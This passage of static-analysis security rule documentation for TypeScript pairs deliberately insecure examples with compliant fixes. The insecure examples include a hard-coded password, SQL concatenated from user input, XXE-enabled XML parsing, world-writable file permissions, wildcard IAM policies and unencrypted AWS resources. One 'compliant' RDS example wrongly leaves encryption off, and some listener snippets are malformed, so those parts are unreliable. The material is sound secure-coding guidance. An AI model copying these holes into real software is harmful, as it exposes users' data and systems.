    loadBalancerPort: '1000',
    protocol: 'http' // Sensitive
  }]
});

For aws-cdk-lib.aws-elasticloadbalancing.LoadBalancer:

import { LoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancing';

const loadBalancer = new LoadBalancer(this, 'elb-tcp-dict', {
    vpc,
    internetFacing: true,
    healthCheck: {
    port: 80,
    },
    listeners: [
    {
        externalPort:10000,
        externalProtocol: LoadBalancingProtocol.TCP, // Sensitive
        internalPort:10000
    }]
});

loadBalancer.addListener({
  externalPort:10001,
  externalProtocol:LoadBalancingProtocol.TCP, // Sensitive
  internalPort:10001
});
loadBalancer.addListener({
  externalPort:10002,
  externalProtocol:LoadBalancingProtocol.HTTP, // Sensitive
  internalPort:10002
});

For aws-cdk-lib.aws-elasticache.CfnReplicationGroup:

import { CfnReplicationGroup } from 'aws-cdk-lib/aws-elasticache';

new CfnReplicationGroup(this, 'unencrypted-implicit', {
  replicationGroupDescription: 'exampleDescription'
}); // Sensitive

new CfnReplicationGroup(this, 'unencrypted-explicit', {
  replicationGroupDescription: 'exampleDescription',
  transitEncryptionEnabled: false // Sensitive
});

For aws-cdk-lib.aws-kinesis.CfnStream:

import { CfnStream } from 'aws-cdk-lib/aws-kinesis';

new CfnStream(this, 'cfnstream-implicit-unencrytped', undefined); // Sensitive

new CfnStream(this, 'cfnstream-explicit-unencrytped', {
  streamEncryption: undefined // Sensitive
});

For aws-cdk-lib.aws-kinesis.Stream:

import { Stream } from 'aws-cdk-lib/aws-kinesis';

new Stream(this, 'stream-explicit-unencrypted', {
  encryption: StreamEncryption.UNENCRYPTED // Sensitive
});

Compliant Solution

url = "https://example.com";
url = "sftp://anonymous@example.com";
url = "ssh://anonymous@example.com";

For nodemailer one of the following options must be set:

const nodemailer = require("nodemailer");
let transporter = nodemailer.createTransport({
  secure: true,
  requireTLS: true,
  port: 465,
  secured: true
});

For ftp:

var Client = require('ftp');
var c = new Client();
c.connect({
  'secure': true
});

For aws-cdk-lib.aws-elasticloadbalancingv2.ApplicationLoadBalancer:

import { ApplicationLoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

const alb = new ApplicationLoadBalancer(this, 'ALB', {
  vpc: vpc,
  internetFacing: true
});

alb.addListener('listener-https-explicit', {
  protocol: ApplicationProtocol.HTTPS,
  port: 8080,
  open: true,
  certificates: [certificate]
});

alb.addListener('listener-https-implicit', {
  port: 8080,
  open: true,
  certificates: [certificate]
});

For aws-cdk-lib.aws-elasticloadbalancingv2.ApplicationListener:

import { ApplicationListener } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

new ApplicationListener(this, 'listener-https-explicit', {
  loadBalancer: loadBalancer,
  protocol: ApplicationProtocol.HTTPS,
  port: 8080,
  open: true,
  certificates: [certificate]
});

For aws-cdk-lib.aws-elasticloadbalancingv2.NetworkLoadBalancer:

import { NetworkLoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

const nlb = new NetworkLoadBalancer(this, 'nlb', {
  vpc: vpc,
  internetFacing: true
});

nlb.addListener('listener-tls-explicit', {
  protocol: Protocol.TLS,
  port: 1234,
  certificates: [certificate]
});

nlb.addListener('listener-tls-implicit', {
  port: 1234,
  certificates: [certificate]
});

For aws-cdk-lib.aws-elasticloadbalancingv2.NetworkListener:

import { NetworkListener } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

new NetworkListener(this, 'listener-tls-explicit', {
  loadBalancer: loadBalancer,
  protocol: Protocol.TLS,
  port: 8080,
  certificates: [certificate]
});

For aws-cdk-lib.aws-elasticloadbalancingv2.CfnListener:

import { CfnListener } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

new CfnListener(this, 'listener-https', {
  defaultActions: defaultActions,
  loadBalancerArn: loadBalancerArn,
  protocol: "HTTPS",
  port: 80
  certificates: [certificate]
});

new CfnListener(this, 'listener-tls', {
  defaultActions: defaultActions,
  loadBalancerArn: loadBalancerArn,
  protocol: "TLS",
  port: 80
  certificates: [certificate]
});

For aws-cdk-lib.aws-elasticloadbalancing.CfnLoadBalancer:

import { CfnLoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancing';

new CfnLoadBalancer(this, 'elb-ssl', {
  listeners: [{
    instancePort: '1000',
    loadBalancerPort: '1000',
    protocol: 'ssl',
    sslCertificateId: sslCertificateId
  }]
});

new CfnLoadBalancer(this, 'elb-https', {
  listeners: [{
    instancePort: '1000',
    loadBalancerPort: '1000',
    protocol: 'https',
    sslCertificateId: sslCertificateId
  }]
});

For aws-cdk-lib.aws-elasticloadbalancing.LoadBalancer:

import { LoadBalancer, LoadBalancingProtocol } from 'aws-cdk-lib/aws-elasticloadbalancing';

const lb = new LoadBalancer(this, 'elb-ssl', {
  vpc,
  internetFacing: true,
  healthCheck: {
    port: 80,
  },
  listeners: [
    {
      externalPort:10000,
      externalProtocol:LoadBalancingProtocol.SSL,
      internalPort:10000
    }]
});

lb.addListener({
  externalPort:10001,
  externalProtocol:LoadBalancingProtocol.SSL,
  internalPort:10001
});
lb.addListener({
  externalPort:10002,
  externalProtocol:LoadBalancingProtocol.HTTPS,
  internalPort:10002
});

For aws-cdk-lib.aws-elasticache.CfnReplicationGroup:

import { CfnReplicationGroup } from 'aws-cdk-lib/aws-elasticache';

new CfnReplicationGroup(this, 'encrypted-explicit', {
  replicationGroupDescription: 'example',
  transitEncryptionEnabled: true
});

For aws-cdk-lib.aws-kinesis.Stream:

import { Stream } from 'aws-cdk-lib/aws-kinesis';

new Stream(this, 'stream-implicit-encrypted');

new Stream(this, 'stream-explicit-encrypted-selfmanaged', {
  encryption: StreamEncryption.KMS,
  encryptionKey: encryptionKey,
});

new Stream(this, 'stream-explicit-encrypted-managed', {
  encryption: StreamEncryption.MANAGED
});

For aws-cdk-lib.aws-kinesis.CfnStream:

import { CfnStream } from 'aws-cdk-lib/aws-kinesis';

new CfnStream(this, 'cfnstream-explicit-encrypted', {
  streamEncryption: {
    encryptionType: encryptionType,
    keyId: encryptionKey.keyId,
  }
});

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Insecure protocol scheme followed by loopback addresses like 127.0.0.1 or localhost.

See

typescript:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", …​

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

var mysql = require('mysql');

var connection = mysql.createConnection(
{
  host:'localhost',
  user: "admin",
  database: "project",
  password: "mypassword", // sensitive
  multipleStatements: true
});

connection.connect();

Compliant Solution

var mysql = require('mysql');

var connection = mysql.createConnection({
  host: process.env.MYSQL_URL,
  user: process.env.MYSQL_USERNAME,
  password: process.env.MYSQL_PASSWORD,
  database: process.env.MYSQL_DATABASE
});
connection.connect();

See

typescript:S6303

Using unencrypted RDS DB resources exposes data to unauthorized access.
This includes database data, logs, automatic backups, read replicas, snapshots, and cluster metadata.

This situation can occur in a variety of scenarios, such as:

  • A malicious insider working at the cloud provider gains physical access to the storage device.
  • Unknown attackers penetrate the cloud provider’s logical infrastructure and systems.

After a successful intrusion, the underlying applications are exposed to:

  • theft of intellectual property and/or personal data
  • extortion
  • denial of services and security bypasses via data corruption or deletion

AWS-managed encryption at rest reduces this risk with a simple switch.

Ask Yourself Whether

  • The database contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to enable encryption at rest on any RDS DB resource, regardless of the engine.
In any case, no further maintenance is required as encryption at rest is fully managed by AWS.

Sensitive Code Example

For aws-cdk-lib.aws_rds.CfnDBCluster:

import { aws_rds as rds } from 'aws-cdk-lib';

new rds.CfnDBCluster(this, 'example', {
  storageEncrypted: false, // Sensitive
});

For aws-cdk-lib.aws_rds.CfnDBInstance:

import { aws_rds as rds } from 'aws-cdk-lib';

new rds.CfnDBInstance(this, 'example', {
  storageEncrypted: false, // Sensitive
});

For aws-cdk-lib.aws_rds.DatabaseCluster:

import { aws_rds as rds } from 'aws-cdk-lib';
import { aws_ec2 as ec2 } from 'aws-cdk-lib';

declare const vpc: ec2.Vpc;

const cluster = new rds.DatabaseCluster(this, 'example', {
  engine: rds.DatabaseClusterEngine.auroraMysql({ version: rds.AuroraMysqlEngineVersion.VER_2_08_1 }),
  instanceProps: {
    vpcSubnets: {
      subnetType: ec2.SubnetType.PRIVATE_WITH_EGRESS,
    },
    vpc,
  },
  storageEncrypted: false, // Sensitive
});

For aws-cdk-lib.aws_rds.DatabaseClusterFromSnapshot:

import { aws_rds as rds } from 'aws-cdk-lib';

declare const vpc: ec2.Vpc;

new rds.DatabaseClusterFromSnapshot(this, 'example', {
  engine: rds.DatabaseClusterEngine.aurora({ version: rds.AuroraEngineVersion.VER_1_22_2 }),
  instanceProps: {
    vpc,
  },
  snapshotIdentifier: 'exampleSnapshot',
  storageEncrypted: false, // Sensitive
});

For aws-cdk-lib.aws_rds.DatabaseInstance:

import { aws_rds as rds } from 'aws-cdk-lib';

declare const vpc: ec2.Vpc;

new rds.DatabaseInstance(this, 'example', {
  engine: rds.DatabaseInstanceEngine.POSTGRES,
  vpc,
  storageEncrypted: false, // Sensitive
});

For aws-cdk-lib.aws_rds.DatabaseInstanceReadReplica:

import { aws_rds as rds } from 'aws-cdk-lib';

declare const sourceInstance: rds.DatabaseInstance;

new rds.DatabaseInstanceReadReplica(this, 'example', {
  sourceDatabaseInstance: sourceInstance,
  instanceType: ec2.InstanceType.of(ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.LARGE),
  vpc,
  storageEncrypted: false, // Sensitive
});

Compliant Solution

For aws-cdk-lib.aws_rds.CfnDBCluster:

import { aws_rds as rds } from 'aws-cdk-lib';

new rds.CfnDBCluster(this, 'example', {
  storageEncrypted: true,
});

For aws-cdk-lib.aws_rds.CfnDBInstance:

import { aws_rds as rds } from 'aws-cdk-lib';

new rds.CfnDBInstance(this, 'example', {
  storageEncrypted: true,
});

For aws-cdk-lib.aws_rds.DatabaseCluster:

import { aws_rds as rds } from 'aws-cdk-lib';

declare const vpc: ec2.Vpc;

const cluster = new rds.DatabaseCluster(this, 'example', {
  engine: rds.DatabaseClusterEngine.auroraMysql({ version: rds.AuroraMysqlEngineVersion.VER_2_08_1 }),
  instanceProps: {
    vpcSubnets: {
      subnetType: ec2.SubnetType.PRIVATE_WITH_EGRESS,
    },
    vpc,
  },
  storageEncrypted: false, // Sensitive
});

For aws-cdk-lib.aws_rds.DatabaseClusterFromSnapshot:

import { aws_rds as rds } from 'aws-cdk-lib';

declare const vpc: ec2.Vpc;

new rds.DatabaseClusterFromSnapshot(this, 'example', {
  engine: rds.DatabaseClusterEngine.aurora({ version: rds.AuroraEngineVersion.VER_1_22_2 }),
  instanceProps: {
    vpc,
  },
  snapshotIdentifier: 'exampleSnapshot',
  storageEncrypted: true,
});

For aws-cdk-lib.aws_rds.DatabaseInstance:

import { aws_rds as rds } from 'aws-cdk-lib';

declare const vpc: ec2.Vpc;

new rds.DatabaseInstance(this, 'example', {
  engine: rds.DatabaseInstanceEngine.POSTGRES,
  vpc,
  storageEncrypted: true,
});

For aws-cdk-lib.aws_rds.DatabaseInstanceReadReplica:

import { aws_rds as rds } from 'aws-cdk-lib';

declare const sourceInstance: rds.DatabaseInstance;

new rds.DatabaseInstanceReadReplica(this, 'example', {
  sourceDatabaseInstance: sourceInstance,
  instanceType: ec2.InstanceType.of(ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.LARGE),
  vpc,
  storageEncrypted: true,
});

See

typescript:S6302

A policy that grants all permissions may indicate an improper access control, which violates the principle of least privilege. Suppose an identity is granted full permissions to a resource even though it only requires read permission to work as expected. In this case, an unintentional overwriting of resources may occur and therefore result in loss of information.

Ask Yourself Whether

Identities obtaining all the permissions:

  • only require a subset of these permissions to perform the intended function.
  • have monitored activity showing that only a subset of these permissions is actually used.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to apply the least privilege principle, i.e. by only granting the necessary permissions to identities. A good practice is to start with the very minimum set of permissions and to refine the policy over time. In order to fix overly permissive policies already deployed in production, a strategy could be to review the monitored activity in order to reduce the set of permissions to those most used.

Sensitive Code Example

A customer-managed policy that grants all permissions by using the wildcard (*) in the Action property:

import { aws_iam as iam } from 'aws-cdk-lib'

new iam.PolicyStatement({
    effect: iam.Effect.ALLOW,
    actions: ["*"], // Sensitive
    resources: ["arn:aws:iam:::user/*"],
})

Compliant Solution

A customer-managed policy that grants only the required permissions:

import { aws_iam as iam } from 'aws-cdk-lib'

new iam.PolicyStatement({
    effect: iam.Effect.ALLOW,
    actions: ["iam:GetAccountSummary"],
    resources: ["arn:aws:iam:::user/*"],
})

See

typescript:S6308

Amazon OpenSearch Service is a managed service to host OpenSearch instances. It replaces Elasticsearch Service, which has been deprecated.

To harden domain (cluster) data in case of unauthorized access, OpenSearch provides data-at-rest encryption if the engine is OpenSearch (any version), or Elasticsearch with a version of 5.1 or above. Enabling encryption at rest will help protect:

  • indices
  • logs
  • swap files
  • data in the application directory
  • automated snapshots

Thus, adversaries cannot access the data if they gain physical access to the storage medium.

Ask Yourself Whether

  • The database contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to encrypt OpenSearch domains that contain sensitive information.

OpenSearch handles encryption and decryption transparently, so no further modifications to the application are necessary.

Sensitive Code Example

For aws-cdk-lib.aws_opensearchservice.Domain:

import { aws_opensearchservice as opensearchservice } from 'aws-cdk-lib';

const exampleDomain = new opensearchservice.Domain(this, 'ExampleDomain', {
  version: EngineVersion.OPENSEARCH_1_3,
}); // Sensitive, encryption must be explicitly enabled

For aws-cdk-lib.aws_opensearchservice.CfnDomain:

import { aws_opensearchservice as opensearchservice } from 'aws-cdk-lib';

const exampleCfnDomain = new opensearchservice.CfnDomain(this, 'ExampleCfnDomain', {
  engineVersion: 'OpenSearch_1.3',
}); // Sensitive, encryption must be explicitly enabled

Compliant Solution

For aws-cdk-lib.aws_opensearchservice.Domain:

import { aws_opensearchservice as opensearchservice } from 'aws-cdk-lib';

const exampleDomain = new opensearchservice.Domain(this, 'ExampleDomain', {
  version: EngineVersion.OPENSEARCH_1_3,
  encryptionAtRest: {
    enabled: true,
  },
});

For aws-cdk-lib.aws_opensearchservice.CfnDomain:

import { aws_opensearchservice as opensearchservice } from 'aws-cdk-lib';

const exampleCfnDomain = new opensearchservice.CfnDomain(this, 'ExampleCfnDomain', {
  engineVersion: 'OpenSearch_1.3',
  encryptionAtRestOptions: {
    enabled: true,
  },
});

See

typescript:S5691

Hidden files are created automatically by many tools to save user-preferences, well-known examples are .profile, .bashrc, .bash_history or .git. To simplify the view these files are not displayed by default using operating system commands like ls.

Outside of the user environment, hidden files are sensitive because they are used to store privacy-related information or even hard-coded secrets.

Ask Yourself Whether

  • Hidden files may have been inadvertently uploaded to the static server’s public directory and it accepts requests to hidden files.
  • There is no business use cases linked to serve files in .name format but the server is not configured to reject requests to this type of files.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Disable the serving of hidden files.

Sensitive Code Example

Express.js serve-static middleware:

let serveStatic = require("serve-static");
let app = express();
let serveStaticMiddleware = serveStatic('public', { 'index': false, 'dotfiles': 'allow'});   // Sensitive
app.use(serveStaticMiddleware);

Compliant Solution

Express.js serve-static middleware:

let serveStatic = require("serve-static");
let app = express();
let serveStaticMiddleware = serveStatic('public', { 'index': false, 'dotfiles': 'ignore'});   // Compliant: ignore or deny are recommended values
let serveStaticDefault = serveStatic('public', { 'index': false});   // Compliant: by default, "dotfiles" (file or directory that begins with a dot) are not served (with the exception that files within a directory that begins with a dot are not ignored), see serve-static module documentation
app.use(serveStaticMiddleware);

See

typescript:S5693

Rejecting requests with significant content length is a good practice to control the network traffic intensity and thus resource consumption in order to prevents DoS attacks.

Ask Yourself Whether

  • size limits are not defined for the different resources of the web application.
  • the web application is not protected by rate limiting features.
  • the web application infrastructure has limited resources.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • For most of the features of an application, it is recommended to limit the size of requests to:
    • lower or equal to 8mb for file uploads.
    • lower or equal to 2mb for other requests.

It is recommended to customize the rule with the limit values that correspond to the web application.

Sensitive Code Example

formidable file upload module:

const form = new Formidable();
form.maxFileSize = 10000000; // Sensitive: 10MB is more than the recommended limit of 8MB

const formDefault = new Formidable(); // Sensitive, the default value is 200MB

multer (Express.js middleware) file upload module:

let diskUpload = multer({
  storage: diskStorage,
  limits: {
    fileSize: 10000000; // Sensitive: 10MB is more than the recommended limit of 8MB
  }
});

let diskUploadUnlimited = multer({ // Sensitive: the default value is no limit
  storage: diskStorage,
});

body-parser module:

// 4MB is more than the recommended limit of 2MB for non-file-upload requests
let jsonParser = bodyParser.json({ limit: "4mb" }); // Sensitive
let urlencodedParser = bodyParser.urlencoded({ extended: false, limit: "4mb" }); // Sensitive

Compliant Solution

formidable file upload module:

const form = new Formidable();
form.maxFileSize = 8000000; // Compliant: 8MB

multer (Express.js middleware) file upload module:

let diskUpload = multer({
  storage: diskStorage,
  limits: {
     fileSize: 8000000 // Compliant: 8MB
  }
});

body-parser module:

let jsonParser = bodyParser.json(); // Compliant, when the limit is not defined, the default value is set to 100kb
let urlencodedParser = bodyParser.urlencoded({ extended: false, limit: "2mb" }); // Compliant

See

typescript:S2077

Formatted SQL queries can be difficult to maintain, debug and can increase the risk of SQL injection when concatenating untrusted values into the query. However, this rule doesn’t detect SQL injections (unlike rule S3649), the goal is only to highlight complex/formatted queries.

Ask Yourself Whether

  • Some parts of the query come from untrusted values (like user inputs).
  • The query is repeated/duplicated in other parts of the code.
  • The application must support different types of relational databases.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Sensitive Code Example

// === MySQL ===
const mysql = require('mysql');
const mycon = mysql.createConnection({ host: host, user: user, password: pass, database: db });
mycon.connect(function(err) {
  mycon.query('SELECT * FROM users WHERE id = ' + userinput, (err, res) => {}); // Sensitive
});

// === PostgreSQL ===
const pg = require('pg');
const pgcon = new pg.Client({ host: host, user: user, password: pass, database: db });
pgcon.connect();
pgcon.query('SELECT * FROM users WHERE id = ' + userinput, (err, res) => {}); // Sensitive

Compliant Solution

// === MySQL ===
const mysql = require('mysql');
const mycon = mysql.createConnection({ host: host, user: user, password: pass, database: db });
mycon.connect(function(err) {
  mycon.query('SELECT name FROM users WHERE id = ?', [userinput], (err, res) => {});
});

// === PostgreSQL ===
const pg = require('pg');
const pgcon = new pg.Client({ host: host, user: user, password: pass, database: db });
pgcon.connect();
pgcon.query('SELECT name FROM users WHERE id = $1', [userinput], (err, res) => {});

Exceptions

This rule’s current implementation does not follow variables. It will only detect SQL queries which are formatted directly in the function call.

const sql = 'SELECT * FROM users WHERE id = ' + userinput;
mycon.query(sql, (err, res) => {}); // Sensitive but no issue is raised.

See

typescript:S4817

This rule is deprecated, and will eventually be removed.

Executing XPATH expressions is security-sensitive. It has led in the past to the following vulnerabilities:

User-provided data such as URL parameters should always be considered as untrusted and tainted. Constructing XPath expressions directly from tainted data enables attackers to inject specially crafted values that changes the initial meaning of the expression itself. Successful XPath injections attacks can read sensitive information from the XML document.

Ask Yourself Whether

  • the XPATH expression might contain some unsafe input coming from a user.

You are at risk if you answered yes to this question.

Recommended Secure Coding Practices

Sanitize any user input before using it in an XPATH expression.

Sensitive Code Example

// === Server side ===

var xpath = require('xpath');
var xmldom = require('xmldom');

var doc = new xmldom.DOMParser().parseFromString(xml);
var nodes = xpath.select(userinput, doc); // Sensitive
var node = xpath.select1(userinput, doc); // Sensitive
// === Client side ===

// Chrome, Firefox, Edge, Opera, and Safari use the evaluate() method to select nodes:
var nodes = document.evaluate(userinput, xmlDoc, null, XPathResult.ANY_TYPE, null); // Sensitive

// Internet Explorer uses its own methods to select nodes:
var nodes = xmlDoc.selectNodes(userinput); // Sensitive
var node = xmlDoc.SelectSingleNode(userinput); // Sensitive

See

typescript:S4818

This rule is deprecated, and will eventually be removed.

Using sockets is security-sensitive. It has led in the past to the following vulnerabilities:

Sockets are vulnerable in multiple ways:

  • They enable a software to interact with the outside world. As this world is full of attackers it is necessary to check that they cannot receive sensitive information or inject dangerous input.
  • The number of sockets is limited and can be exhausted. Which makes the application unresponsive to users who need additional sockets.

This rules flags code that creates sockets. It matches only the direct use of sockets, not use through frameworks or high-level APIs such as the use of http connections.

Ask Yourself Whether

  • sockets are created without any limit every time a user performs an action.
  • input received from sockets is used without being sanitized.
  • sensitive data is sent via sockets without being encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • In many cases there is no need to open a socket yourself. Use instead libraries and existing protocols.
  • Encrypt all data sent if it is sensitive. Usually it is better to encrypt it even if the data is not sensitive as it might change later.
  • Sanitize any input read from the socket.
  • Limit the number of sockets a given user can create. Close the sockets as soon as possible.

Sensitive Code Example

const net = require('net');

var socket = new net.Socket(); // Sensitive
socket.connect(80, 'google.com');

// net.createConnection creates a new net.Socket, initiates connection with socket.connect(), then returns the net.Socket that starts the connection
net.createConnection({ port: port }, () => {}); // Sensitive

// net.connect is an alias to net.createConnection
net.connect({ port: port }, () => {}); // Sensitive

See

typescript:S6319

Amazon SageMaker is a managed machine learning service in a hosted production-ready environment. To train machine learning models, SageMaker instances can process potentially sensitive data, such as personal information that should not be stored unencrypted. In the event that adversaries physically access the storage media, they cannot decrypt encrypted data.

Ask Yourself Whether

  • The instance contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SageMaker notebook instances that contain sensitive information. Encryption and decryption are handled transparently by SageMaker, so no further modifications to the application are necessary.

Sensitive Code Example

For aws-cdk-lib.aws-sagemaker.CfnNotebookInstance

import { CfnNotebookInstance } from 'aws-cdk-lib/aws-sagemaker';

new CfnNotebookInstance(this, 'example', {
      instanceType: 'instanceType',
      roleArn: 'roleArn'
}); // Sensitive

Compliant Solution

For aws-cdk-lib.aws-sagemaker.CfnNotebookInstance

import { CfnNotebookInstance } from 'aws-cdk-lib/aws-sagemaker';

const encryptionKey = new Key(this, 'example', {
    enableKeyRotation: true,
});
new CfnNotebookInstance(this, 'example', {
    instanceType: 'instanceType',
    roleArn: 'roleArn',
    kmsKeyId: encryptionKey.keyId
});

See

typescript:S2755

This vulnerability allows the usage of external entities in XML.

Why is this an issue?

External Entity Processing allows for XML parsing with the involvement of external entities. However, when this functionality is enabled without proper precautions, it can lead to a vulnerability known as XML External Entity (XXE) attack.

What is the potential impact?

Exposing sensitive data

One significant danger of XXE vulnerabilities is the potential for sensitive data exposure. By crafting malicious XML payloads, attackers can reference external entities that contain sensitive information, such as system files, database credentials, or configuration files. When these entities are processed during XML parsing, the attacker can extract the contents and gain unauthorized access to sensitive data. This poses a severe threat to the confidentiality of critical information.

Exhausting system resources

Another consequence of XXE vulnerabilities is the potential for denial-of-service attacks. By exploiting the ability to include external entities, attackers can construct XML payloads that cause resource exhaustion. This can overwhelm the system’s memory, CPU, or other critical resources, leading to system unresponsiveness or crashes. A successful DoS attack can disrupt the availability of services and negatively impact the user experience.

Forging requests

XXE vulnerabilities can also enable Server-Side Request Forgery (SSRF) attacks. By leveraging the ability to include external entities, an attacker can make the vulnerable application send arbitrary requests to other internal or external systems. This can result in unintended actions, such as retrieving data from internal resources, scanning internal networks, or attacking other systems. SSRF attacks can lead to severe consequences, including unauthorized data access, system compromise, or even further exploitation within the network infrastructure.

How to fix it in libxmljs

Code examples

The following code contains examples of XML parsers that have external entity processing enabled. As a result, the parsers are vulnerable to XXE attacks if an attacker can control the XML file that is processed.

Noncompliant code example

var libxmljs = require('libxmljs');
var fs = require('fs');

var xml = fs.readFileSync('xxe.xml', 'utf8');
libxmljs.parseXmlString(xml, {
    noblanks: true,
    noent: true, // Noncompliant
    nocdata: true
});

Compliant solution

parseXmlString is safe by default.

var libxmljs = require('libxmljs');
var fs = require('fs');

var xml = fs.readFileSync('xxe.xml', 'utf8');
libxmljs.parseXmlString(xml);

How does this work?

Disable external entities

The most effective approach to prevent XXE vulnerabilities is to disable external entity processing entirely, unless it is explicitly required for specific use cases. By default, XML parsers should be configured to reject the processing of external entities. This can be achieved by setting the appropriate properties or options in your XML parser library or framework.

If external entity processing is necessary for certain scenarios, adopt a whitelisting approach to restrict the entities that can be resolved during XML parsing. Create a list of trusted external entities and disallow all others. This approach ensures that only known and safe entities are processed.
You should rely on features provided by your XML parser to restrict the external entities.

Resources

Standards

typescript:S5443

Operating systems have global directories where any user has write access. Those folders are mostly used as temporary storage areas like /tmp in Linux based systems. An application manipulating files from these folders is exposed to race conditions on filenames: a malicious user can try to create a file with a predictable name before the application does. A successful attack can result in other files being accessed, modified, corrupted or deleted. This risk is even higher if the application runs with elevated permissions.

In the past, it has led to the following vulnerabilities:

This rule raises an issue whenever it detects a hard-coded path to a publicly writable directory like /tmp (see examples bellow). It also detects access to environment variables that point to publicly writable directories, e.g., TMP and TMPDIR.

  • /tmp
  • /var/tmp
  • /usr/tmp
  • /dev/shm
  • /dev/mqueue
  • /run/lock
  • /var/run/lock
  • /Library/Caches
  • /Users/Shared
  • /private/tmp
  • /private/var/tmp
  • \Windows\Temp
  • \Temp
  • \TMP

Ask Yourself Whether

  • Files are read from or written into a publicly writable folder
  • The application creates files with predictable names into a publicly writable folder

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a dedicated sub-folder with tightly controlled permissions
  • Use secure-by-design APIs to create temporary files. Such API will make sure:
    • The generated filename is unpredictable
    • The file is readable and writable only by the creating user ID
    • The file descriptor is not inherited by child processes
    • The file will be destroyed as soon as it is closed

Sensitive Code Example

const fs = require('fs');

let tmp_file = "/tmp/temporary_file"; // Sensitive
fs.readFile(tmp_file, 'utf8', function (err, data) {
  // ...
});
const fs = require('fs');

let tmp_dir = process.env.TMPDIR; // Sensitive
fs.readFile(tmp_dir + "/temporary_file", 'utf8', function (err, data) {
  // ...
});

Compliant Solution

const tmp = require('tmp');

const tmpobj = tmp.fileSync(); // Compliant

See

typescript:S1525

This rule is deprecated; use S4507 instead.

Why is this an issue?

The debugger statement can be placed anywhere in procedures to suspend execution. Using the debugger statement is similar to setting a breakpoint in the code. By definition such statement must absolutely be removed from the source code to prevent any unexpected behavior or added vulnerability to attacks in production.

Noncompliant code example

for (i = 1; i<5; i++) {
  // Print i to the Output window.
  Debug.write("loop index is " + i);
  // Wait for user to resume.
  debugger;
}

Compliant solution

for (i = 1; i<5; i++) {
  // Print i to the Output window.
  Debug.write("loop index is " + i);
}

Resources

typescript:S2612

In Unix file system permissions, the "others" category refers to all users except the owner of the file system resource and the members of the group assigned to this resource.

Granting permissions to this category can lead to unintended access to files or directories that could allow attackers to obtain sensitive information, disrupt services or elevate privileges.

Ask Yourself Whether

  • The application is designed to be run on a multi-user environment.
  • Corresponding files and directories may contain confidential information.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The most restrictive possible permissions should be assigned to files and directories.

Sensitive Code Example

Node.js fs

const fs = require('fs');

fs.chmodSync("/tmp/fs", 0o777); // Sensitive
const fs = require('fs');
const fsPromises = fs.promises;

fsPromises.chmod("/tmp/fsPromises", 0o777); // Sensitive
const fs = require('fs');
const fsPromises = fs.promises

async function fileHandler() {
  let filehandle;
  try {
    filehandle = fsPromises.open('/tmp/fsPromises', 'r');
    filehandle.chmod(0o777); // Sensitive
  } finally {
    if (filehandle !== undefined)
      filehandle.close();
  }
}

Node.js process.umask

const process = require('process');

process.umask(0o000); // Sensitive

Compliant Solution

Node.js fs

const fs = require('fs');

fs.chmodSync("/tmp/fs", 0o770); // Compliant
const fs = require('fs');
const fsPromises = fs.promises;

fsPromises.chmod("/tmp/fsPromises", 0o770); // Compliant
const fs = require('fs');
const fsPromises = fs.promises

async function fileHandler() {
  let filehandle;
  try {
    filehandle = fsPromises.open('/tmp/fsPromises', 'r');
    filehandle.chmod(0o770); // Compliant
  } finally {
    if (filehandle !== undefined)
      filehandle.close();
  }
}

Node.js process.umask

const process = require('process');

process.umask(0o007); // Compliant

See

typescript:S1523

Executing code dynamically is security-sensitive. It has led in the past to the following vulnerabilities:

Some APIs enable the execution of dynamic code by providing it as strings at runtime. These APIs might be useful in some very specific meta-programming use-cases. However most of the time their use is frowned upon as they also increase the risk of Injected Code. Such attacks can either run on the server or in the client (exemple: XSS attack) and have a huge impact on an application’s security.

This rule raises issues on calls to eval and Function constructor. This rule does not detect code injections. It only highlights the use of APIs which should be used sparingly and very carefully. The goal is to guide security code reviews.

The rule also flags string literals starting with javascript: as the code passed in javascript: URLs is evaluated the same way as calls to eval or Function constructor.

Ask Yourself Whether

  • the executed code may come from an untrusted source and hasn’t been sanitized.
  • you really need to run code dynamically.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Regarding the execution of unknown code, the best solution is to not run code provided by an untrusted source. If you really need to do it, run the code in a sandboxed environment. Use jails, firewalls and whatever means your operating system and programming language provide (example: Security Managers in java, iframes and same-origin policy for javascript in a web browser).

